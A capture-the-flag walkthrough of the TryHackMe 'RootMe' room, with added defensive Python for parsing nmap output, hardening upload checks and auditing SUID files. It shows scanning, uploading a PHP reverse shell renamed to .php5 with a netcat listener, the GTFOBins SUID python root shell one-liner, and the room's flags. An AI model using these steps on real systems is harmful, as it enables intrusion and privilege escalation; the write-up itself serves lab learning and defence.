RootMe
A ctf for beginners, can you root me?
Task 1 Deploy the machine
Connect to TryHackMe network and deploy the machine. If you don’t know how to do this, complete the OpenVPN room first.
First connect to OpenVPN. After connecting, ping the machine's IP to check connectivity.
The second step is to create a new working directory on the Desktop:
#mkdir rootme
#cd rootme
#pwd
STEP 1
Deploy the machine by clicking Start Machine.
- Deploy the machine
Ans: No answer needed
Task 2 Reconnaissance
First, let’s get information about the target.
- Scan the machine, how many ports are open?
Ans: 2
Explained question 1
┌──(root💀kali)-[/home/blackhat]
└─# nmap -A 10.10.238.126
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-29 19:16 IST
Nmap scan report for 10.10.238.126
Host is up (0.18s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT — Home
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
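As an added example (not part of the room or this writeup), the Python script below parses nmap's normal output and answers the next three questions programmatically; it also pulls out the httponly finding that nmap reported against port 80. The sample text is a constructed excerpt of the scan above.

```python
import re

# Constructed excerpt of the nmap -A output shown above (sample input, not a live scan).
NMAP_OUTPUT = """\
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)(?:\s+(.*))?$")

def parse_ports(text):
    """One dict per port line; NSE script lines are attached to the port above them."""
    ports = []
    for raw in text.splitlines():
        line = raw.strip()
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            ports.append({"port": int(port), "proto": proto, "state": state,
                          "service": service, "version": (version or "").strip(),
                          "scripts": []})
        elif line.startswith("|") and ports:
            ports[-1]["scripts"].append(line.lstrip("|_ ").strip())
    return ports

def open_ports(text):
    return [p for p in parse_ports(text) if p["state"] == "open"]

def service_on(text, port):
    return next((p["service"] for p in parse_ports(text) if p["port"] == port), None)

def apache_version(text):
    """Version string from the Apache service line, or None if Apache is absent."""
    for p in parse_ports(text):
        m = re.search(r"Apache httpd (\d+\.\d+(?:\.\d+)?)", p["version"])
        if m:
            return m.group(1)
    return None

def weak_cookie_flags(text):
    """Ports whose NSE output reports a session cookie without the httponly flag."""
    return [p["port"] for p in parse_ports(text)
            if any("httponly flag not set" in s for s in p["scripts"])]
```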
2. What version of Apache is running?
Ans: 2.4.29
3. What service is running on port 22?
Ans: ssh
4. Find directories on the web server using the GoBuster tool.
Ans: No Ans Needed
5. What is the hidden directory?
Ans: /panel/
Explained question 5
Using gobuster:
gobuster dir -u http://ip/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
note: http://ip/ stands for the target's IP address (10.10.238.126 in the scan above)
┌──(root💀kali)-[/home/blackhat]
└─# gobuster dir -u http://10.10.238.126/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
========================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
========================================
[+] Url: http://10.10.238.126/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
========================================
2021/05/29 19:29:27 Starting gobuster in directory enumeration mode
========================================
/uploads (Status: 301) [Size: 316] [ → http://10.10.238.126/uploads/]
/css (Status: 301) [Size: 312] [ → http://10.10.238.126/css/]
/js (Status: 301) [Size: 311] [ → http://10.10.238.126/js/]
/panel (Status: 301) [Size: 314] [ → http://10.10.238.126/panel/]
Task 3 Getting a shell
Find a form to upload and get a reverse shell, and find the flag.
The upload form is in the /panel directory found by gobuster above:
- /panel (Status: 301) [Size: 314] [ → http://10.10.238.126/panel/]
To complete this section, follow the steps below.
Steps
- Open http://ip/panel/ in the browser and leave it open. Then move to the next step.
- Get the pentestmonkey PHP reverse shell from GitHub, copy the PHP code into a text editor and save the file with a .php extension. NOTE: try to save this file on the Desktop.
- Upload the file through the form in the browser. Files with a .php extension cannot be uploaded, so rename the extension to .php5, .jpg, or .png. I used .php5.
- Upload the file again with the new extension.
- Open http://ip/uploads/ and check that the file is there. Don't open the file yet, or you may get an error.
- Go to the terminal and run the commands given below.
┌──(root💀kali)-[/home/blackhat]
└─# nc -lvnp 4444
Now go to the browser and open the file you uploaded. You will get a result like this:
┌──(root💀kali)-[/home/blackhat]
└─# nc -lvnp 4444
listening on [any] 4444 …
connect to [10.9.4.31] from (UNKNOWN) [10.10.76.20] 56326
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
13:10:51 up 51 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Now it's time to get the flag.
Question
Find a form to upload and get a reverse shell, and find the flag.
Q. user.txt
(hint: Search for “file upload bypass” and “PHP reverse shell”.)
Ans: THM{y0u_g0t_a_sh3ll}
Explained
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls
bin
boot
cdrom
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
swap.img
sys
tmp
usr
var
vmlinuz
vmlinuz.old
$ cd root
/bin/sh: 4: cd: can't cd to root
$ find / -name user.txt
find: ‘/home/rootme/.cache’: Permission denied
find: ‘/home/rootme/.gnupg’: Permission denied
/var/www/user.txt
find: ‘/var/spool/rsyslog’: Permission denied
find: ‘/var/spool/cron/atjobs’: Permission denied
find: ‘/var/spool/cron/crontabs’: Permission denied
find: ‘/snap/core/9665/var/lib/waagent’: Permission denied
find: ‘/snap/core/9665/var/spool/cron/crontabs’: Permission denied
find: ‘/snap/core/9665/var/spool/rsyslog’: Permission denied
$ cat /var/www/user.txt
THM{y0u_g0t_a_sh3ll}
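The upload bypass in the steps above works because the panel uses a denylist: it refuses the exact extension .php and nothing else, while the server still executes .php5 as PHP. As an added example (not from the room or this writeup), here is that weak check beside a hardened one in Python: an allowlist of image extensions, rejection of nested server-side extensions such as shell.php5.png, a magic-byte check that the bytes really are an image, and a server-chosen storage name. The sample files, the SERVER_SIDE set and stored_name are assumptions.

```python
import os
import secrets

# Constructed sample uploads (not files from the room): a PHP file and a real PNG header.
PHP_FILE = b"<?php echo 'not an image'; ?>\n"
PNG_FILE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

ALLOWED = {".jpg", ".jpeg", ".png", ".gif"}
# Assumed set of extensions a typical Apache+PHP handler will execute.
SERVER_SIDE = {"php", "php3", "php4", "php5", "phtml"}
MAGIC = {b"\xff\xd8\xff": ".jpg", b"\x89PNG\r\n\x1a\n": ".png",
         b"GIF87a": ".gif", b"GIF89a": ".gif"}

def weak_check(filename):
    """Denylist, as the panel behaves: only an exact '.php' extension is refused."""
    return os.path.splitext(filename)[1].lower() != ".php"

def hardened_check(filename, data):
    """Allowlist the final extension, reject nested server-side extensions,
    and require the file content to match the claimed image type."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) < 2:
        return False
    ext = "." + parts[-1]
    if ext not in ALLOWED or any(p in SERVER_SIDE for p in parts[1:-1]):
        return False
    if ext == ".jpeg":
        ext = ".jpg"
    return any(data.startswith(magic) and want == ext for magic, want in MAGIC.items())

def stored_name(ext):
    """Server-chosen name for storage outside the web root; the client name is discarded."""
    return secrets.token_hex(16) + ext
```

With the hardened check in place, the renamed reverse shell is rejected twice over: the extension is not on the allowlist, and the content does not start with an image signature.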
Task 4 Privilege escalation
Now that we have a shell, let’s escalate our privileges to root.
- Search for files with SUID permission, which file is weird?
(Hint: find / -user root -perm /4000)
Ans: /usr/bin/python
Explained
$ find / -user root -perm /4000
find: ‘/etc/polkit-1/localauthority’: Permission denied
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
find: ‘/proc/tty/driver’: Permission denied
find: ‘/proc/1/task/1/fd’: Permission denied
Or you can use this command, which sends the "Permission denied" errors to /dev/null so only the paths are shown:
$ find / -user root -perm /4000 2>/dev/null
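From the defender's side, the finding above is what a SUID audit should catch: an interpreter (/usr/bin/python) carrying the SUID bit that no stock image ships with. As an added example (not from the room), the Python audit below parses the find output, diffs it against an assumed baseline of expected SUID binaries, flags interpreters regardless of baseline, and includes a live scanner equivalent to `find / -perm /4000`. FIND_OUTPUT is a constructed subset of the output above and BASELINE is an assumption.

```python
import os
import stat

# Constructed subset of the find output shown above; the "Permission denied"
# lines are kept on purpose so the parser has to skip them.
FIND_OUTPUT = """\
find: '/etc/polkit-1/localauthority': Permission denied
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/bin/chsh
/usr/bin/python
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/pkexec
find: '/proc/tty/driver': Permission denied
"""

# Assumed baseline: SUID files expected on this host (e.g. recorded from a
# clean build of the same image). Anything outside it deserves a look.
BASELINE = {
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/snapd/snap-confine",
    "/usr/lib/openssh/ssh-keysign", "/usr/bin/chsh", "/usr/bin/passwd",
    "/usr/bin/sudo", "/usr/bin/pkexec",
}
# Interpreters and shells should never carry SUID, baseline or not.
INTERPRETERS = {"python", "python2", "python3", "perl", "ruby", "bash", "sh"}

def parse_find(text):
    """Keep only real paths; drop find's permission warnings."""
    return [l.strip() for l in text.splitlines()
            if l.strip() and not l.startswith("find:")]

def audit(paths, baseline=BASELINE):
    """Return (unexpected, interpreters) for the given SUID paths."""
    unexpected = sorted(p for p in paths if p not in baseline)
    interp = sorted(p for p in paths
                    if os.path.basename(p).split(".")[0] in INTERPRETERS)
    return unexpected, interp

def scan_suid(root):
    """Live equivalent of `find ROOT -perm /4000`: (path, owner uid) per SUID regular file."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid))
    return hits
```

Feeding the live result of scan_suid("/") into audit() gives the same two lists without depending on find's text output.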
2. Find a form to escalate your privileges
(Hint: Search for gtfobins)
STEPS
- Open a browser and search for it, or go straight to https://gtfobins.github.io/gtfobins/python/
- Then read the SUID section, quoted below:
SUID
If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.
This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.
sudo install -m =xs $(which python) .
./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
3. Now go to the terminal:
$ /usr/bin/./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
ls (type this command yourself; the new shell does not print a prompt)
bin
boot
cdrom
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
swap.img
sys
tmp
usr
var
vmlinuz
vmlinuz.old
4. Now run the following commands to get the flag.
whoami
root
cd root
ls
root.txt
cat root.txt
THM{pr1v1l3g3_3sc4l4t10n}